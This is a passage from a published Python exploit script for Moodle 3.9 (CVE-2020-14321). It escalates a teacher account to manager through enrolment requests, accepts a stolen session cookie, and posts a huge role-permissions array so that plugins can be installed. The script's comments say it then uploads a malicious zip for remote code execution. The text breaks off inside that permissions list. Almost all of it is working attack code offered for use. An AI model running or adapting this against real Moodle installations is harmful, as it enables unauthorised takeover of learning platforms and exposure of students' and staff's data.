# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 12-05-2021
# Exploit Author: lanz
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.9
# Tested on: FreeBSD
#!/usr/bin/python3
## Moodle 3.9 - RCE (Authenticated as teacher)
## Based on PoC and Payload to assign full permissions to manager rol:
## * https://github.com/HoangKien1020/CVE-2020-14321
## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py
import string, random
import requests, re
import argparse
import base64
import signal
import time
from pwn import *
class Color:
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
def def_handler(sig, frame):
print(Color.RED + "\n[!] 3xIt1ngG...\n")
exit(1)
signal.signal(signal.SIGINT, def_handler)
banner = base64.b64decode("IF9fICAgICBfXyAgICAgX18gICBfXyAgX18gICBfXyAgICAgICAgICAgICAgX18gIF9fICAgICAKLyAgXCAgL3xfICBfXyAgIF8pIC8gIFwgIF8pIC8gIFwgX18gIC98IHxfX3wgIF8pICBfKSAvfCAKXF9fIFwvIHxfXyAgICAgL19fIFxfXy8gL19fIFxfXy8gICAgICB8ICAgIHwgX18pIC9fXyAgfCDigKIgYnkgbGFuegoKTW9vZGxlIDMuOSAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbiAoQXV0aGVudGljYXRlZCBhcyB0ZWFjaGVyKQpDb3Vyc2UgZW5yb2xtZW50cyBhbGxvd2VkIHByaXZpbGVnZSBlc2NhbGF0aW9uIGZyb20gdGVhY2hlciByb2xlIGludG8gbWFuYWdlciByb2xlIHRvIFJDRQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==").decode()
print(Color.BLUE + banner + Color.END)
def usagemybro():
fNombre = os.path.basename(__file__)
ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n'
ussage += '[+] Examples:\n'
ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n'
ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n"
return ussage
def arguments():
parse = argparse.ArgumentParser(usage=usagemybro())
parse.add_argument(dest='url', type=str, help='URL Moodle site')
parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz')
parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!')
parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25')
parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5')
parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami')
parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)')
return parse.parse_args()
def login(url, username, password, course_id, teacher_cookie):
'''
Sign in on site, with creds or with cookie
'''
p1 = log.progress("Login on site")
session = requests.Session()
r = session.get(url + '/login/index.php')
# Sign in with teacher cookie
if teacher_cookie != "":
p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END)
time.sleep(2)
# In case the URL format is: http://moodle.site.com/moodle
cookie_domain = url.split('/')[2] # moodle.site.com
cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/
session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path)
r = session.get(url + '/user/index.php', params={"id":course_id})
try:
re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
except IndexError:
p1.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
exit(1)
id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END)
time.sleep(1)
# Sign in with teacher credentials
elif username and password != "":
p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END)
time.sleep(2)
login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0]
data_post = {
"anchor" : "",
"logintoken" : login_token,
"username" : username,
"password" : password
}
r = session.post(url + '/login/index.php', data=data_post)
if "Recently accessed courses" not in r.text:
p1.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid credentials.\n")
exit(1)
id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END)
time.sleep(1)
else:
print(Color.RED + "\nUse valid credentials or valid cookie\n")
exit(1)
return session, id_user, sess_key
def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command):
'''
Assign rol manager to teacher and manager account in the course.
'''
p4 = log.progress("Updating roles to move on manager accout")
time.sleep(1)
r = session.get(url + '/user/index.php', params={"id":course_id})
try:
teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
except IndexError:
p4.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
exit(1)
p4.status("Teacher " + Color.BLUE + teacher_user + Color.END)
time.sleep(1)
id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
session = update_rol(session, url, sess_key, course_id, id_user)
session = update_rol(session, url, sess_key, course_id, id_manager)
data_get = {
"id" : course_id,
"user" : id_manager,
"sesskey" : sess_key
}
r = session.get(url + '/course/loginas.php', params=data_get)
if "You are logged in as" not in r.text:
p4.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n")
exit(1)
p4.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
# Updating rol manager to enable install plugins
session, sess_key = update_rol_manager(session, url, sess_key)
# Upload malicious zip file
zipb64_up(session, url, sess_key, teacher_user, course_id)
# RCE on system
moodle_RCE(url, command)
def update_rol(session, url, sess_key, course_id, id_user):
'''
Updating teacher rol to enable he update other users
'''
data_get = {
"mform_showmore_main" : "0",
"id" : course_id,
"action" : "enrol",
"enrolid" : "10",
"sesskey" : sess_key,
"_qf__enrol_manual_enrol_users_form" : "1",
"mform_showmore_id_main" : "0",
"userlist[]" : id_user,
"roletoassign" : "1",
"startdate" : "4",
"duration" : ""
}
r = session.get(url + '/enrol/manual/ajax.php', params=data_get)
return session
def update_rol_manager(session, url, sess_key):
'''
Updating rol manager to enable install plugins
* Extracted from: https://github.com/HoangKien1020/CVE-2020-14321
'''
p6 = log.progress("Updating rol manager to enable install plugins")
time.sleep(1)
data_get = {
"action":"edit",
"roleid":"1"
}
random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15))
# Headache part :P
data_post = [('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewalldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),('tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolself','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges:configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:viewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent','1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:viewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry','1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/workshop:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_seb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items: